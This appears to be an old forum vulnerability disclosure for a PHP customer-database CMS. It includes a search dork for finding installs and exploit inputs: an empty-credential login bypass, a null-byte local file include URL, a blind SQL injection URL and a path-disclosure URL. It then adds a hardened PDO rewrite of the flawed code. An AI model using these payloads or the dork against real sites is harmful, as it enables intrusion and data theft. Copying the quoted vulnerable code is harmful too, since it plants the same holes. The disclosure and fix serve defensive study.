Dimi4
12.04.2009, 21:12
Vulnerabilities in KTP Computer Customer Database CMS
Product : KTP Computer Customer Database CMS
Dork : "KTPCCD & KTPotG ©2008 Keith Thibodeaux"
Site: http://sourceforge.net/project/showfiles.php?group_id=245189
Found by: Dimi4
Date : 12.04.09
Auth bypass
[pages/login.php]
Here is a clumsy function. It checks only the password:
if ($_GET['a'] == "login") {
$lname = $_POST['lname'];
$lpass = md5($_POST['lpass']);
$q = mysql_query("SELECT * FROM techs WHERE tloginname = '$lname'");
$result = mysql_fetch_array($q);
if ($lpass == $result['tloginpass']) {
$_SESSION['tid'] = $result['tid'];
$_SESSION['loggedin'] = "1";
$_SESSION['tname'] = $result['tfname'] . " " . $result['tlname'];
$lin = 1;
$template->assign('name', $_SESSION['tname']);
$template->assign('id', $_SESSION['tid']);
$template->assign('func', "in");
$template->display('login.tpl');
} else {
echo "login failed";
}
} // closes if ($_GET['a'] == "login")
We log in with an empty login and an empty password.
Local File Include
[index.php]
if (isset($_GET['p'])) {
include 'pages/' . $_GET['p'] . '.php';
} else {
include 'pages/index.php';
}
http://localhost/ktp/?p={PATH}%00
Blind SQL-inj
[index.php]
function gettech($tid) {
if ($result = mysql_query("SELECT * FROM techs WHERE tid = '$tid'")) {
$tech = mysql_fetch_array($result);
return $tech;
} else {
echo mysql_error();
}
}
http://localhost/ktp/?p=tech&a=vtech&tid=1'+and+substring(@@version,1,1)=[num]--
Full Path Disclosure
[index.php]
http://localhost/ktp/pages/tech/changepassword.php
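Added example, not code from the CMS or from the post's author: a hardened rewrite of the three code spots quoted above (login check, page include, gettech()), written against PDO instead of the old mysql_* API. Assumptions: a PDO handle $pdo to the same techs table, password hashes stored with password_hash() rather than md5(), and an allowlist of page names (index, login, tech) that is assumed to match the install. The points it shows are the ones the post exposes: a lookup that matches no row must fail the login instead of comparing against null, user input goes into queries as bound parameters, include paths come from a fixed list rather than from the query string, and database errors are logged rather than echoed (which also closes the path-disclosure channel).

```php
<?php
declare(strict_types=1);

// 1. Login. The original compared md5($_POST['lpass']) against whatever
//    mysql_fetch_array() returned, even when no row matched. Here the lookup
//    is parameterised, a missing row is a failed login, and the password is
//    checked with password_verify() against a password_hash() value.
function login(PDO $pdo, string $lname, string $lpass): ?array
{
    if ($lname === '' || $lpass === '') {
        return null;                                   // reject empty credentials outright
    }
    $stmt = $pdo->prepare(
        'SELECT tid, tfname, tlname, tloginpass FROM techs WHERE tloginname = ?'
    );
    $stmt->execute([$lname]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    if ($row === false) {
        return null;                                   // no such user: same answer as a bad password
    }
    if (!password_verify($lpass, (string) $row['tloginpass'])) {
        return null;
    }
    session_regenerate_id(true);                       // fresh session id on privilege change
    $_SESSION['tid']      = (int) $row['tid'];
    $_SESSION['loggedin'] = '1';
    $_SESSION['tname']    = $row['tfname'] . ' ' . $row['tlname'];
    return $row;
}

// 2. Page include. The original did include 'pages/' . $_GET['p'] . '.php',
//    so $p could walk the filesystem. Only names from a fixed list are honoured.
const PAGES = ['index', 'login', 'tech'];              // assumed page set for this install

function resolvePage(?string $p): string
{
    if ($p === null || !in_array($p, PAGES, true)) {
        return 'pages/index.php';
    }
    return 'pages/' . $p . '.php';
}

// 3. gettech(). The original interpolated $tid straight into the SQL string.
//    tid is an integer id, so anything non-numeric is rejected before the query.
function gettech(PDO $pdo, string $tid): ?array
{
    if (!ctype_digit($tid)) {
        return null;
    }
    $stmt = $pdo->prepare('SELECT * FROM techs WHERE tid = ?');
    $stmt->execute([(int) $tid]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Dispatch, mirroring index.php/login.php but routed through the checks above.
// Database errors are logged, never echoed, so neither mysql_error() output nor
// an uncaught-exception page leaks the install path.
try {
    // $pdo = new PDO('mysql:host=localhost;dbname=ktp', $dbUser, $dbPass,
    //                [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);   // assumed DSN
    session_start();
    if (($_GET['a'] ?? '') === 'login') {
        $user = login($pdo, (string) ($_POST['lname'] ?? ''), (string) ($_POST['lpass'] ?? ''));
        echo $user === null ? 'login failed' : 'logged in';
    }
    include resolvePage($_GET['p'] ?? null);
} catch (PDOException $e) {
    error_log('ktp db error: ' . $e->getMessage());    // goes to the server log only
    http_response_code(500);
    echo 'internal error';
}
```

Pages under pages/ such as changepassword.php are still reachable directly by URL; with display_errors turned off in php.ini and the catch block above, a request to one of them no longer prints a PHP warning containing the absolute path.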